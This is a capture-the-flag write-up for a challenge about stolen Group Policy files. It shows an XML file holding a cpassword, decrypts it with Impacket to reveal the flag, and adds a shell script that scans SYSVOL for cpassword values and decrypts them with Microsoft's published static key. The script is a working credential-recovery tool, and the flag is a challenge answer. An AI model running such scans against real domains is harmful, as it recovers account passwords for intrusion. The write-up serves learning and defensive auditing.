Statement: Looks like the attacker managed to access the rebels' Domain Controller.
Can you figure out how they got access after pulling these artifacts from one of our Outpost machines?
The challenge provides an archive containing several GPOs.
Inspecting them, I quickly noticed a cpassword attribute in one of the Group Policy Preferences XML files
(Machine/Preferences/Groups/Groups.xml):
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Backup" image="2" changed="2024-06-12 14:26:50" uid="{CE475804-94EA-4C12-8B2E-2B3FFF1A05C4}">
    <Properties action="U" newName="" fullName="" description="" cpassword="B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Backup"/>
  </User>
</Groups>
A cpassword is not a hash: it is the account password, AES-256-CBC encrypted with a static key that Microsoft published on MSDN, so anyone who can read the file (every domain user can read SYSVOL) can recover it. MS14-025 stopped the GPP editor from saving new passwords, but it did not remove XML files already present in SYSVOL. Impacket ships a Get-GPPPassword example script that does the decryption; the LOCAL target tells it to parse a file on disk instead of a share:
# impacket-Get-GPPPassword -xmlfile Groups.xml LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Found a Groups XML file:
[*] file : Machine/Preferences/Groups/Groups.xml
[*] newName :
[*] userName : Backup
[*] password : DUCTF{D0n7_Us3_P4s5w0rds_1n_Gr0up_P0l1cy}
[*] changed : 2024-06-12 14:26:50
Flag : DUCTF{D0n7_Us3_P4s5w0rds_1n_Gr0up_P0l1cy}
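To show what Get-GPPPassword is doing under the hood, here is an added POSIX shell example (not part of the original writeup, and not Impacket's code) that locates cpassword attributes in every Group Policy Preferences XML type under a directory and decrypts them with openssl using the static GPP AES-256 key. It assumes openssl, base64 and (optionally) iconv are on PATH; the function names and the demo directory layout are my own, and the Groups.xml written at the end is constructed from the writeup's cpassword value.

```shell
#!/bin/sh
# Added example: decrypt GPP cpassword values without Impacket.
# Assumes: openssl(1), base64(1) and, for non-ASCII passwords, iconv(1).

# AES-256 key Microsoft published on MSDN for GPP; it is the same in every domain.
GPP_AES_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b

# The decrypted plaintext is UTF-16LE; convert it to UTF-8 for the terminal.
utf16le_to_utf8() {
    if command -v iconv >/dev/null 2>&1; then
        iconv -f UTF-16LE -t UTF-8
    else
        # Fallback: drop the NUL high bytes (correct only for ASCII passwords).
        tr -d '\000'
    fi
}

# Usage: decrypt_cpassword <cpassword-attribute-value>
decrypt_cpassword() {
    cp="$1"
    # GPP strips the base64 '=' padding; restore it so base64 -d accepts the input
    # (the 128-character value from this challenge happens to need none).
    while [ $(( ${#cp} % 4 )) -ne 0 ]; do cp="${cp}="; done
    # AES-256-CBC with an all-zero IV and PKCS#7 padding.
    printf '%s' "$cp" | base64 -d \
        | openssl enc -d -aes-256-cbc -K "$GPP_AES_KEY" \
              -iv 00000000000000000000000000000000 \
        | utf16le_to_utf8
}

# Usage: scan_gpp <sysvol-or-extracted-gpo-dir>
# Walks every GPP XML type that can carry a cpassword and prints
# "file:account:password" for each one found.
scan_gpp() {
    find "$1" -type f \( -name Groups.xml -o -name Services.xml \
         -o -name ScheduledTasks.xml -o -name DataSources.xml \
         -o -name Drives.xml -o -name Printers.xml \) 2>/dev/null \
    | while IFS= read -r f; do
        grep -o 'cpassword="[^"]*"' "$f" | sed 's/^cpassword="//; s/"$//' \
        | while IFS= read -r cpw; do
            [ -n "$cpw" ] || continue   # cpassword="" means no password stored
            # Account attribute differs per file type: userName, accountName or runAs.
            acct=$(grep -o -e 'userName="[^"]*"' -e 'accountName="[^"]*"' \
                           -e 'runAs="[^"]*"' "$f" | head -n1 \
                   | sed 's/^[^=]*="//; s/"$//')
            printf '%s:%s:%s\n' "$f" "$acct" "$(decrypt_cpassword "$cpw")"
        done
    done
}

# Demo on a constructed Groups.xml carrying the cpassword from the writeup.
demo_dir=$(mktemp -d)
mkdir -p "$demo_dir/Machine/Preferences/Groups"
cat > "$demo_dir/Machine/Preferences/Groups/Groups.xml" <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<Groups><User name="Backup"><Properties action="U" cpassword="B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2" userName="Backup"/></User></Groups>
EOF
scan_gpp "$demo_dir"
rm -rf "$demo_dir"
```

Pointing scan_gpp at a mounted SYSVOL (for example \\dc\SYSVOL\domain\Policies) reproduces what the Impacket script does over SMB, and is a quick way for a defender to confirm no legacy cpassword files are left behind after MS14-025.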
Source :